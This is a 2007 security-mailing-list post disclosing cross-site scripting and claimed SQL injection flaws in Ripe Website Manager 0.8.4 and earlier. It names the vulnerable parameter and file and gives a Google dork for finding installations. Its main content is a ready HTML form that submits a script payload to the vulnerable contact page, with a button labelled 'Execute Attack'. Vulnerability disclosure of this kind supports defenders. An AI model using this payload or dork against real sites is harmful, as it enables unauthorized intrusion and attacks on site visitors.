Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit Apr 22 2007 10:11PM
john martinelli com
<!--

Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit

Vulnerable Variable: ripeformpost (Cross-Site Scripting and SQL Injection possible)
Vulnerable File: contact/index.php
Vulnerable: Ripe Website Manager (<= 0.8.4)
Google d0rk: "Powered by Ripe Website Manager"

John Martinelli
john (at) martinelli (dot) com [email concealed]
http://john-martinelli.com

April 22nd, 2007

!-->

<html>
<head><title>Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit</title><body>

<center><br><br><font size=4>Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager>
"Powered by Ripe Website Manager"</a></font><br>

<br><br>
<form action="http://www.example.com/path/contact/index.php" method="post">
<input name="ripeformpost" size=75 value="<"<<script>alert(1);</script>">
<input type=submit value="Execute Attack" class="button">
</form>

</body></html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus